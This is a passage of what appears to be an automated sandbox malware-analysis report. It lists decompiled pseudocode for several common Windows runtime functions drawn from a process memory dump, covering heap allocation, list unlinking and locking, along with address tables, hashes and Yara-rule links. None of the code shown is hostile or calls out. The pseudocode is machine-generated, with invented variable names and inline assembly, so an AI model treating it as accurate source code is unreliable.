				_t21 =  *0x4dc7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04CF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E04D1F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04CF7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04D19AE0();
					_t24 = L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                            0x04d57799
                                                                                            0x04d5779a
                                                                                            0x04d5779b
                                                                                            0x04d577a3
                                                                                            0x04d577ab
                                                                                            0x04d577ae
                                                                                            0x04d577b1
                                                                                            0x04d577b1
                                                                                            0x04d577bf
                                                                                            0x04d577c4
                                                                                            0x04d577c8
                                                                                            0x04d577ce
                                                                                            0x04d577d4
                                                                                            0x04d577e0
                                                                                            0x04d577e0
                                                                                            0x04d577d6
                                                                                            0x04d577d6
                                                                                            0x04d577de
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d577de
                                                                                            0x04d577e5
                                                                                            0x04d577f0
                                                                                            0x04d577f3
                                                                                            0x04d577f6
                                                                                            0x04d577fd
                                                                                            0x04d57800
                                                                                            0x04d5780c
                                                                                            0x04d57818
                                                                                            0x04d5782b
                                                                                            0x04d5781a
                                                                                            0x04d57823
                                                                                            0x04d57823
                                                                                            0x04d57830
                                                                                            0x04d57831
                                                                                            0x04d57838
                                                                                            0x04d5783d
                                                                                            0x04d5783e
                                                                                            0x04d5784f
                                                                                            0x04d5784f
                                                                                            0x04d5785a

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 684cc5d3f6d012691f63f9ba0bd7c30c08d87fe771063bbcc3c25a56b00f7ce9
                                                                                            • Instruction ID: f2d462cf74ab426e0007522b94f7a8dc3f69429869fbd76ce0d2e57d7023feea
                                                                                            • Opcode Fuzzy Hash: 684cc5d3f6d012691f63f9ba0bd7c30c08d87fe771063bbcc3c25a56b00f7ce9
                                                                                            • Instruction Fuzzy Hash: 10216F72501604ABCB25DF69DC90EABBBA9FF48740F10456DEA0AD7760DA34E900CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0FD9B, Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E04D0FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E04CE76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04CF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                            0x04d0fd9b
                                                                                            0x04d0fda0
                                                                                            0x04d0fda1
                                                                                            0x04d0fdab
                                                                                            0x04d0fdad
                                                                                            0x04d0fdb0
                                                                                            0x04d0fdb8
                                                                                            0x04d0fe0f
                                                                                            0x04d0fde6
                                                                                            0x04d0fde9
                                                                                            0x04d0fdec
                                                                                            0x04d4c0c0
                                                                                            0x04d0fdfe
                                                                                            0x04d0fe06
                                                                                            0x04d0fe06
                                                                                            0x04d4c0c8
                                                                                            0x04d0fe2d
                                                                                            0x04d0fe2d
                                                                                            0x00000000
                                                                                            0x04d0fe2d
                                                                                            0x04d4c0d1
                                                                                            0x04d4c0e0
                                                                                            0x04d4c0e5
                                                                                            0x04d4c0e5
                                                                                            0x04d4c0e8
                                                                                            0x00000000
                                                                                            0x04d4c0e8
                                                                                            0x04d0fdf4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0fdf6
                                                                                            0x04d0fdfa
                                                                                            0x04d0fe1a
                                                                                            0x04d0fe1f
                                                                                            0x04d0fe1f
                                                                                            0x04d0fdfc
                                                                                            0x00000000
                                                                                            0x04d0fdfc
                                                                                            0x04d0fdcc
                                                                                            0x04d0fdd0
                                                                                            0x04d0fe26
                                                                                            0x00000000
                                                                                            0x04d0fe26
                                                                                            0x04d0fdd8
                                                                                            0x04d0fddb
                                                                                            0x04d0fddd
                                                                                            0x04d0fde0
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                            • Instruction ID: 11b9115a39c69b9122b7c57ff3acdc77c287651dbc33d1714cb6e2b51879ced6
                                                                                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                            • Instruction Fuzzy Hash: 2D217972600A40DBD735CF4AC540B66B7E5FB94B10F25816EE98987661E774FD00DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CD9240, Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E04CD9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4daf708);
				E04D2D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04D195D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04D195D0();
				_t33 =  *0x4dc84c4; // 0x0
				L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4dc84c4; // 0x0
				L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4dc84c4; // 0x0
				E04CF2280(L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4dc86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04D195D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04D195D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04CD9325();
					_t50 =  *0x4dc84c4; // 0x0
					return E04D2D0D1(L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                            0x04cd9240
                                                                                            0x04cd9242
                                                                                            0x04cd9247
                                                                                            0x04cd924c
                                                                                            0x04cd924e
                                                                                            0x04cd9255
                                                                                            0x04cd9257
                                                                                            0x04cd925a
                                                                                            0x04cd925f
                                                                                            0x04cd925f
                                                                                            0x04cd9266
                                                                                            0x04cd9271
                                                                                            0x04cd9276
                                                                                            0x04cd9279
                                                                                            0x04cd927e
                                                                                            0x04cd9295
                                                                                            0x04cd929a
                                                                                            0x04cd92b1
                                                                                            0x04cd92b6
                                                                                            0x04cd92d7
                                                                                            0x04cd92dc
                                                                                            0x04cd92e0
                                                                                            0x04cd92e6
                                                                                            0x04cd92e8
                                                                                            0x04cd92ee
                                                                                            0x04cd9332
                                                                                            0x04cd9333
                                                                                            0x04cd9337
                                                                                            0x04cd9338
                                                                                            0x04cd933a
                                                                                            0x04cd933a
                                                                                            0x04cd933d
                                                                                            0x04cd9342
                                                                                            0x04cd9342
                                                                                            0x04cd9345
                                                                                            0x04cd9349
                                                                                            0x04cd934e
                                                                                            0x04cd9352
                                                                                            0x04cd9357
                                                                                            0x04cd92f4
                                                                                            0x04cd92f4
                                                                                            0x04cd92f6
                                                                                            0x04cd92f9
                                                                                            0x04cd9300
                                                                                            0x04cd9306
                                                                                            0x04cd9324
                                                                                            0x04cd9324

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: a92a6f312294ff9085180345ee3afb1ed6f1b4ac6867f4adf863f3ac7c346347
                                                                                            • Instruction ID: 8ca9f3d7fa4e96583222740a1d662d0af0c698dbff26f04ff697c3c3a1441fcc
                                                                                            • Opcode Fuzzy Hash: a92a6f312294ff9085180345ee3afb1ed6f1b4ac6867f4adf863f3ac7c346347
                                                                                            • Instruction Fuzzy Hash: 95217871151A01DFD722EF68CA10F5AB7BAFF08308F0045A8E20A876B1CB38F941EB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0B390, Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 54%
                                                                                            			E04D0B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04CF2280(_t12, 0x4dc8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E04D100C2(0x4dc8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                            0x04d0b395
                                                                                            0x04d0b3a2
                                                                                            0x04d0b3a5
                                                                                            0x04d0b3aa
                                                                                            0x04d0b3b2
                                                                                            0x04d0b3ba
                                                                                            0x04d0b3bd
                                                                                            0x04d0b3c0
                                                                                            0x04d0b3c4
                                                                                            0x04d0b3c9
                                                                                            0x04d4a3e9
                                                                                            0x04d4a3ed
                                                                                            0x04d4a3f0
                                                                                            0x04d4a3ff
                                                                                            0x04d4a403
                                                                                            0x04d4a409
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4a40b
                                                                                            0x04d4a40b
                                                                                            0x04d4a40f
                                                                                            0x04d4a415
                                                                                            0x04d4a423
                                                                                            0x04d4a423
                                                                                            0x04d4a415
                                                                                            0x04d0b3d1
                                                                                            0x04d0b3e8
                                                                                            0x04d0b3e8
                                                                                            0x04d0b3d9

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ea77381732469166b90ce653ea1bf83b679584d9e4307ae13cbf6a68d7477dad
                                                                                            • Instruction ID: 150527b221aadfabb172fa100fbf76200a0b52c3607a8226cdddd96344c6e6b3
                                                                                            • Opcode Fuzzy Hash: ea77381732469166b90ce653ea1bf83b679584d9e4307ae13cbf6a68d7477dad
                                                                                            • Instruction Fuzzy Hash: 601148337451209BDF199A949D81A6B7267EBC5334B34412EED16973C0DE32BC02D694
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D64257, Relevance: .1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 90%
                                                                                            			E04D64257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x4db08d0);
				E04D2D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E04D641E8(__ebx, __edi, __ecx, _t39);
				E04CEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x4dc87e4;
					_t18 =  *0x4dc87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4dc5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x4dc87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x4dc87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04CD7055(_t31 + 0xfffffff8);
								_t24 =  *0x4dc87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x4dc87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4dc5cd0;
				if( *0x4dc5cd0 <= 0) {
					L04CD7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x4dc87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x4dc87e8 = _t30;
						 *0x4dc87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E04D2D0D1(L04D64320());
			}















                                                                                            0x04d64257
                                                                                            0x04d64257
                                                                                            0x04d64257
                                                                                            0x04d64259
                                                                                            0x04d6425e
                                                                                            0x04d64263
                                                                                            0x04d64265
                                                                                            0x04d64273
                                                                                            0x04d64278
                                                                                            0x04d6427c
                                                                                            0x04d6427f
                                                                                            0x04d64281
                                                                                            0x04d64287
                                                                                            0x04d642d7
                                                                                            0x04d642d7
                                                                                            0x04d642da
                                                                                            0x04d6428d
                                                                                            0x04d6428d
                                                                                            0x04d6428f
                                                                                            0x04d64292
                                                                                            0x04d64297
                                                                                            0x04d6429c
                                                                                            0x04d642a0
                                                                                            0x04d642a6
                                                                                            0x04d642a8
                                                                                            0x04d642ae
                                                                                            0x04d642b3
                                                                                            0x00000000
                                                                                            0x04d642ba
                                                                                            0x04d642ba
                                                                                            0x04d642bf
                                                                                            0x04d642c5
                                                                                            0x04d642ca
                                                                                            0x04d642cf
                                                                                            0x04d642d0
                                                                                            0x00000000
                                                                                            0x04d642d0
                                                                                            0x04d642b3
                                                                                            0x00000000
                                                                                            0x04d642a6
                                                                                            0x04d6429c
                                                                                            0x04d642dc
                                                                                            0x04d642dc
                                                                                            0x04d642e3
                                                                                            0x04d64309
                                                                                            0x04d642e5
                                                                                            0x04d642e5
                                                                                            0x04d642e8
                                                                                            0x04d642ee
                                                                                            0x04d642f0
                                                                                            0x00000000
                                                                                            0x04d642f2
                                                                                            0x04d642f2
                                                                                            0x04d642f4
                                                                                            0x04d642f7
                                                                                            0x04d642f9
                                                                                            0x04d64300
                                                                                            0x04d64300
                                                                                            0x04d642f0
                                                                                            0x04d6430e
                                                                                            0x04d6431f

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dd907fc9ed3530e16a1ef317cf509d3c1863e4d610723f11a1a9b452f3cc8986
                                                                                            • Instruction ID: 5a92ad75feef5441e64540ac0c1c1327c4e4285f425755c781cb5ad237a9b3b9
                                                                                            • Opcode Fuzzy Hash: dd907fc9ed3530e16a1ef317cf509d3c1863e4d610723f11a1a9b452f3cc8986
                                                                                            • Instruction Fuzzy Hash: 74218C70642702CFDB15EF6AD120A14B7F1FB89319B20826EE1468B394EB39F881DF44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D546A7, Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E04D546A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04CF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04D1F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04D0D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04CF77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                            0x04d546b7
                                                                                            0x04d546ba
                                                                                            0x04d546c5
                                                                                            0x04d546c8
                                                                                            0x04d546d0
                                                                                            0x04d546d4
                                                                                            0x04d546e6
                                                                                            0x04d546e9
                                                                                            0x04d546f4
                                                                                            0x04d546ff
                                                                                            0x04d54705
                                                                                            0x04d54706
                                                                                            0x04d5470c
                                                                                            0x04d54713
                                                                                            0x04d5471b
                                                                                            0x04d54723
                                                                                            0x04d54725
                                                                                            0x04d546d6
                                                                                            0x04d546d9
                                                                                            0x04d546db
                                                                                            0x04d546db
                                                                                            0x04d54732

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                            • Instruction ID: 6ef06509860407a181da5043d500e1674387c8b8e0269a4b8e60f7dad19694c5
                                                                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                            • Instruction Fuzzy Hash: DB112572604208BBDB059F6CD8809BEB7B9EF95304F10806EFD84C7350DA31AD51D7A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D02397, Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 34%
                                                                                            			E04D02397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x4dc848c != 0) {
					L04CFFAD0(0x4dc8610);
					if( *0x4dc848c == 0) {
						E04CFFA00(0x4dc8610, _t19, _t27, 0x4dc8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04D02581(0x4dc8610, 0x4cb50a0, _t26, _t27, _t28);
						E04CFFA00(0x4dc8610, 0x4cb50a0, _t27, 0x4dc8610);
					}
				} else {
					L1:
					_t11 =  *0x4dc8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04D14886(0x4cb1088, 1, 0x4dc8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04D02581(0x4dc8610, (_t11 << 4) + 0x4cb5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                            0x04d023b0
                                                                                            0x04d023b6
                                                                                            0x04d02409
                                                                                            0x04d02415
                                                                                            0x04d45ae9
                                                                                            0x00000000
                                                                                            0x04d0241b
                                                                                            0x04d0241b
                                                                                            0x04d0241d
                                                                                            0x04d02427
                                                                                            0x04d0242e
                                                                                            0x04d02430
                                                                                            0x04d02430
                                                                                            0x04d023b8
                                                                                            0x04d023b8
                                                                                            0x04d023b8
                                                                                            0x04d023bf
                                                                                            0x04d023fc
                                                                                            0x04d023fc
                                                                                            0x04d023c1
                                                                                            0x04d023c3
                                                                                            0x04d023d0
                                                                                            0x04d023d8
                                                                                            0x04d023d8
                                                                                            0x04d023dc
                                                                                            0x04d023de
                                                                                            0x04d023e1
                                                                                            0x04d023e1
                                                                                            0x04d023ec

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3de45d8c9821932bd17c4265d76c97da547a161ea68cd0bd4ddd2fb86c643813
                                                                                            • Instruction ID: c5602ecceee32e3e3fb16592410b0018e9bae8f5f4d6b86b396d5c6328f5e096
                                                                                            • Opcode Fuzzy Hash: 3de45d8c9821932bd17c4265d76c97da547a161ea68cd0bd4ddd2fb86c643813
                                                                                            • Instruction Fuzzy Hash: 5811AB3134430167FB20AB29EC88F15B28AFB50329F14846EF606A73C0C974FC00A7A4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D137F5, Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 87%
                                                                                            			E04D137F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04CF2280(_t6, 0x4dc8550);
				}
				_t29 = E04D1387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E04CEFFB0(0x4dc8550, _t27, 0x4dc8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                            0x04d137fa
                                                                                            0x04d137fc
                                                                                            0x04d13805
                                                                                            0x04d13808
                                                                                            0x04d13808
                                                                                            0x04d13814
                                                                                            0x04d13818
                                                                                            0x04d13846
                                                                                            0x04d13848
                                                                                            0x04d1384b
                                                                                            0x04d1384b
                                                                                            0x04d13852
                                                                                            0x00000000
                                                                                            0x04d13854
                                                                                            0x04d13856
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d13863
                                                                                            0x00000000
                                                                                            0x04d13863
                                                                                            0x04d1381a
                                                                                            0x04d1381a
                                                                                            0x04d1381f
                                                                                            0x04d1386e
                                                                                            0x04d1386e
                                                                                            0x04d13871
                                                                                            0x04d13873
                                                                                            0x04d13873
                                                                                            0x04d13868
                                                                                            0x00000000
                                                                                            0x04d13868
                                                                                            0x04d13821
                                                                                            0x04d13826
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d13828
                                                                                            0x04d1382a
                                                                                            0x04d13841
                                                                                            0x00000000
                                                                                            0x04d13841

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
